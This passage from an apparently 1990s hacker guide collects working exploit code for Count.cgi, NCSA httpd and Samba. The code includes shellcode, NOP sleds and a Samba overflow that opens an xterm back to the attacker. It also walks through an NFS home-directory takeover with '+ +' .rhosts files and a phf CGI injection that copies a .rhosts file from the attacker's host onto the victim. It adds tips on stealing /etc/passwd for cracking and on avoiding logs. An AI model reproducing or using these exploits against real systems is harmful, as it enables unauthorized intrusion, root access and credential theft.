qs[compt+0] = stack & 0x000000ff; qs[compt+1] = (stack & 0x0000ff00) >> 8; qs[compt+2] = (stack & 0x00ff0000) >> 16; qs[compt+3] = (stack & 0xff000000) >> 24; } strcpy(qs,chaine); qs[strlen(chaine)]=0x90; qs[4104]= stack&0x000000ff; qs[4105]=(stack&0x0000ff00)>>8; qs[4106]=(stack&0x00ff0000)>>16; qs[4107]=(stack&0xff000000)>>24; qs[4108]= stack&0x000000ff; qs[4109]=(stack&0x0000ff00)>>8; qs[4110]=(stack&0x00ff0000)>>16; qs[4111]=(stack&0xff000000)>>24; qs[4112]= stack&0x000000ff; qs[4113]=(stack&0x0000ff00)>>8; qs[4114]=(stack&0x00ff0000)>>16; qs[4115]=(stack&0xff000000)>>24; qs[4116]= stack&0x000000ff; qs[4117]=(stack&0x0000ff00)>>8; qs[4118]=(stack&0x00ff0000)>>16; qs[4119]=(stack&0xff000000)>>24; qs[4120]= stack&0x000000ff; qs[4121]=(stack&0x0000ff00)>>8; qs[4122]=(stack&0x00ff0000)>>16; qs[4123]=(stack&0xff000000)>>24; qs[4124]= stack&0x000000ff; qs[4125]=(stack&0x0000ff00)>>8; qs[4126]=(stack&0x00ff0000)>>16; qs[4127]=(stack&0xff000000)>>24; qs[4128]= stack&0x000000ff; qs[4129]=(stack&0x0000ff00)>>8; qs[4130]=(stack&0x00ff0000)>>16; qs[4131]=(stack&0xff000000)>>24; strcpy((char*)&qs[4132],shell); /* Choose what to do here */ printf("GET /cgi-bin/Count.cgi?%s\n\n",qs); /*fprintf(stderr,"\n\nadresse: %x0x\n",stack); printf("GET /cgi-bin/Count.cgi?%s HTTP/1.0\nUser-Agent: %x\n\n",qs,stack); setenv("QUERY_STRING",qs,1); system("/usr/local/etc/httpd/cgi-bin/Count.cgi"); system("/bin/sh");*/ } And of course, The HTTPD Exploit ... :) /* * NCSA 1.3 Linux/intel remote xploit by savage@apostols.org 1997-April-23 * * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore,EDevil and the rest of ToXyn !!! * * usage: * $ (hackttpd 0; cat) | nc victim 143 * | * +--> usually from -1000 to 1000 (try steeps of 100) */ #include unsigned char shell[] = { '/',0x90,0x90,0x90, 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 , 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 , 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 , 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 , 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 , 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 , 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 , 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 , 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 , 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 , 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90 , 0xeb,0x27,0x5e,0x31,0xed,0x31,0xc9,0x31,0xc0,0x88,0x6e,6,0x89,0xf3,0x89,0x76, 0x24,0x89,0x6e,0x28,0x8d,0x6e,0x24,0x89,0xe9,0x8d,0x6e,0x28,0x89,0xea,0xb0,0x0b , 0xcd,0x80,0x31,0xdb,0x89,0xd8,0x40,0xcd,0x80,0xe8,0xd4,0xff,0xff,0xff, 'b','i','n','/','s','h' }; char username[256+8]; void main(int argc, char *argv[]) { int i,a; long val; if(argc>1) a=atoi(argv[1]); else a=0; strcpy(username,shell); for(i=strlen(shell);i> 8; username[i+2] = (val & 0x00ff0000) >> 16; username[i+3] = (val & 0xff000000) >> 24; } username[ sizeof(username) ] = 0; printf("GET %s\n/bin/bash -i 2>&1;\n", username); } And, last but not least, the samba ExpLoit.. :) /* ___ ______ _ _ / \ | _ \ | \ / | | / \ | | | \ | | \_/ | | |___| | | |_ / | | \_/ | | --- | | / | | | | ''' ''' ''''''' '''' '''' CreW Presente For Y0uR plEaSure Samba remote & LocaL buffer overflow! found & exploited by some "blaireaux" and "mr3615phf" :))))))))))) recursive greetz: ADM ! a special greetz to the ppl of the "offset effort" fr4wd,fratalG,and the rest of t0xyn , and my friend [oO giemor Oo] . big up to: da movement . codeurz greetz going to: aleph1 & to samba team anal greetz: #banane suxxxxxxxxxxx Hotlame & Co ------------------------------------------------------------------------------ explain of the bug: is really simple if your send a large passwd bha your make a buffer overflow hahhahaha =) iam not good for explain go fuck !=)) --**JOKE**-- ------------------------------------------------------------------------------ patch ?? WHAT U WANNA A PATCH ??? :)))) ------------------------------------------------------------------------------ [SO..] we search the shellcode of other system (SUNos , solaris, etc) and specialy SCO ! ------------------------------------------------------------------------------ usage: first you must have a special smbclient for send a large large passwd how ?? tell me for the bin of get the source of samba and change in smb.h at line 248: typedef char pstring[1024]; to typedef char pstring[20000]; and now compile smbclient ! # make smbclient [dont forget to edit the makefile !!] see the line 199 in makefile ------------------------------------------------------------------------------- mail 4 question, comments etc etc bla bla : admsmb@hotmail.com ------------------------------------------------------------------------------- */ /* Note i have include a little utility pinched from ADMtoolz for get the netbios name -------------------------------------------------------------------------- ------------------------------[ADMnmbname.c]---------------------------------- -------------------------------------------------------------------------- * / #define DEFAULT_OFFSET 3500 #define DEFAULT_BUFFER_SIZE 3081 #define NOP 0x90 #define NMBHDRSIZE 13 #include #include #include #include #include #include #include #include #include #include #include #include #include #include struct nmbhdr { unsigned short int id; unsigned char R:1; unsigned char opcode:4; unsigned char AA:1; unsigned char TC:1; unsigned char RD:1; unsigned char RA:1; unsigned char unless:2; unsigned char B:1; unsigned char RCODE:4; unsigned short int que_num; unsigned short int rep_num; unsigned short int num_rr; unsigned short int num_rrsup; unsigned char namelen; }; struct typez{ u_int type; u_int type2; }; unsigned int host2ip(char *serv) { struct sockaddr_in sin; struct hostent *hent; hent=gethostbyname(serv); if(hent == NULL) return 0; bzero((char *)&sin, sizeof(sin)); bcopy(hent->h_addr, (char *)&sin.sin_addr, hent->h_length); return sin.sin_addr.s_addr; } main( int argc, char **argv) { struct sockaddr_in sin_me , sin_dst; struct nmbhdr *nmb,*nmb2; struct iphdr *ipz; struct typez *typz; struct hostent *hent; int socket_client,sr,num,i=1,bha,timeout=0,try=0,GO=0; int longueur=sizeof(struct sockaddr_in); char *data; char *dataz; char buffer[1024]; char buffer2[1024]; char namezz[1024]; char name[64]="CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0"; char c; if(argc <2) { printf("usage: ADMnmbname \n"); exit (0); } socket_client=socket(AF_INET,SOCK_DGRAM,17); sr=socket(AF_INET,SOCK_RAW,17); ioctl(sr,FIONBIO,&i); sin_me.sin_family=AF_INET; sin_me.sin_addr.s_addr=htonl(INADDR_ANY); sin_me.sin_port=htons(2600); sin_dst.sin_family=AF_INET; sin_dst.sin_port=htons(137); sin_dst.sin_addr.s_addr = host2ip(argv[1]); nmb = (struct nmbhdr *) buffer; data = (char *)(buffer+NMBHDRSIZE); typz = (struct typez *)(buffer+NMBHDRSIZE+33); nmb2 = (struct nmbhdr *)(buffer2+20+8); ipz = (struct iphdr *)buffer2; dataz = (char *)(buffer2+50+7+20+8); memset(buffer,0,1024); memset(buffer2,0,1024); memset(namezz,0,1024); memcpy(data,name,33); /* play with the netbios query format :) */ nmb->id=0x003; nmb->R=0; /* 0 for question 1 for response */ nmb->opcode=0; /* 0 = query */ nmb->que_num=htons(1); /* i have only 1 question :) */ nmb->namelen=0x20; typz->type=0x2100; typz->type2=0x1000; sendto(socket_client,buffer,50,0,(struct sockaddr *)&sin_dst,longueur); for(timeout=0;timeout<90;timeout++ ) { usleep(100000); buffer2[0]='0'; recvfrom(sr,buffer2,800,0,(struct sockaddr *)&sin_dst,&(int)longueur ); if(buffer2[0]!='0') { if(nmb2->rep_num!=0) { bha=0; for(;;) { c=*(dataz+bha); if(c!='\x20') { namezz[bha]=c; bha++; } if(c=='\x20')break; } printf("netbios name of %s is %s\n",argv[1],nam ezz); try =4; GO = 4; break; } } } memset(buffer,0,1024); memset(buffer2,0,1024); } /* --------------------------------------------------------------------------- ----------------------------[ADMkillsamba.c]--------------------------------- --------------------------------------------------------------------------- generic buffer overflow ameliored for samba sploit the sploit send a xterm to your machine . hey dont forget to do a xhost +IP-OF-VICTIM !!!! and put the the sploit to the same directory of the special smbclient ! */ /* diz default offset and buffer size Work fine on a my system Redhat 4.2 with samba server 1.9.17alpha5 < the last version !> i have tested on other system with this deff autl buff & size smb 1.9.16p[9-11] the default srv on redhat 4.1 4.2 but somtime you need to ch ange the buffer size and offset try a buffer of ( 10501100) and a offset ( 15 002500) mail me at admsmb@hotmail.com if u wanna some help */ #define DEFAULT_OFFSET 3500 #define DEFAULT_BUFFER_SIZE 3081 #define NOP 0x90 #include #include unsigned char shellcode[500] = "\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74" "\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f" "\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd" "\x80\xe8\xcc\xff\xff\xff"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; char netbios_name[100]; char bufferz[255]; char ipz[40]; char myipz[40]; unsigned char bla[50] = "\xfe\xe8\xb1\xff\xff\xff"; int *ret; unsigned char cmd[50]="/usr/bin/X11/xterm\xff-display\xff"; unsigned char arg1[50]; char arg2[50]="bhahah\xff"; int i,pid; bzero(netbios_name,100); bzero(bufferz,255); bzero(ipz,40); bzero(ipz,40); if(argc <4){ printf(" usage: ADMkillsamba [buf f size] [offset size]\n"); printf(" = 11.11.11.11 ! THe numerical IP Only ! not www.xxx. cc !\n"); printf(" = VICTIME for get the netbios name use ADMnmbname o r ADMhack\n"); printf(" = the sploit send a xterm to your machine heh \n"); printf("option:\n"); printf("[buff size] = the size of the buffer to send default is 3081 try +1 - 1 to a plage of +10 -10\n"); printf("[offset size] = the size of the offset default is 3500 try +50 -50 to a plage of 1000 -1000\n"); printf(" HaVe Fun\n"); exit(0); } sprintf(arg1,"%s:0\xff-e\xff/bin/sh\xff",argv[3]); shellcode[4] =(unsigned char)0x32+strlen(cmd)+strlen(arg1); bla[2] =(unsigned char) 0xc9-strlen(cmd)-strlen(arg1); printf("4 byte = 0x%x\n",shellcode[4]); printf("5 byte = 0x%x\n",bla[2]); strcat(shellcode,cmd); strcat(shellcode,arg1); strcat(shellcode,bla); strcat(shellcode,"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxx"); // printf("%s\n",shellcode); strcpy(ipz,argv[1]); /* haha u can overflow my sploit :) */ strcpy(netbios_name,argv[2]); if (argc > 4) bsize = atoi(argv[4]); if (argc > 5) offset = atoi(argv[5]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } sprintf(bufferz,"\\\\\\\\%s\\\\IPC$",netbios_name); addr = 0xbffffff0 - offset ; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/4; i++) buff[i] = NOP; ptr = buff + ((bsize/4) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; execl("./smbclient","smbclient",bufferz,buff,"-I",ipz,NULL); } ------------------------------------------[END]-------------------------------- ----------------- Now, dont you wish you had samba ?????????? :) Well, this about covers most of it, but it covers only the exploit part... For the rest, i use my very very old guide, to explain the nfs problems && phf.. bcoz i got tired of writting... sooooooooooooo ... here it is.. :) The first thing I do is see if the system has an export list: mysite:~>/usr/sbin/showmount -e victim.site.com RPC: Program not registered. If it gives a message like this one, then it's time to search another way in. What I was trying to do was to exploit an old security problem by most SUN OS's that could allow an remote attacker to add a .rhosts to a users home directory... (That was possible if the site had mounted their home directory. Let's see what happens... mysite:~>/usr/sbin/showmount -e victim1.site.com /usr victim2.site.com /home (everyone) /cdrom (everyone) mysite:~>mkdir /tmp/mount mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/ mysite:~>ls -sal /tmp/mount total 9 1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./ 1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../ 1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/ 1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/ 1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/ 1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/ 1 -rw------- 1 root root 242 Mar 9 1997 sudoers 1 drwx------ 3 test 100 1024 Oct 8 21:05 test/ 1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/ Well, we wanna hack into rapper's home. mysite:~#id uid=0 euid=0 mysite:~#whoami root mysite:~#echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd We use /bin/csh because bash usually leaves a (Damn!) .bash_history and you might forget it on the remote server... mysite:~>su - rapper Welcome to rapper's user. mysite:~>ls -lsa /tmp/mount/ total 9 1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./ 1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../ 1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/ 1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/ 1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/ 1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/ 1 -rw------- 1 root root 242 Mar 9 1997 sudoers *snifsnif* 1 drwx------ 3 test 100 1024 Oct 8 21:05 test/ 1 drwx------ 15 rapper daemon 1024 Oct 20 18:57 rapper/ So we own this guy's home directory... mysite:~>echo "+ +" > rapper/.rhosts mysite:~>cd / mysite:~>rlogin victim1.site.com Welcome to Victim.Site.Com. SunOs ver....(crap). victim1:~$ Well, now be very carefull with the web exploits, because they usually get logged. (not usually, always.. :)) Besides, if you really wanna get a source file from /cgi-bin/ use this sintax : lynx http://www.victim1.com//cgi-bin/finger... that should work on some systems.. :) If you don't wanna do that, then do a : mysite:~>echo "+ +" > /tmp/rhosts mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+ /root/.rhosts" | nc -v - 20 victim1.site.com 80 mysite:~>rlogin -l root victim1.site.com Welcome to Victim1.Site.Com. victim1:~# or instead of rcp-ing, try catt-ing the /etc/passwd file, and then cracking it, to get passwords... And so on......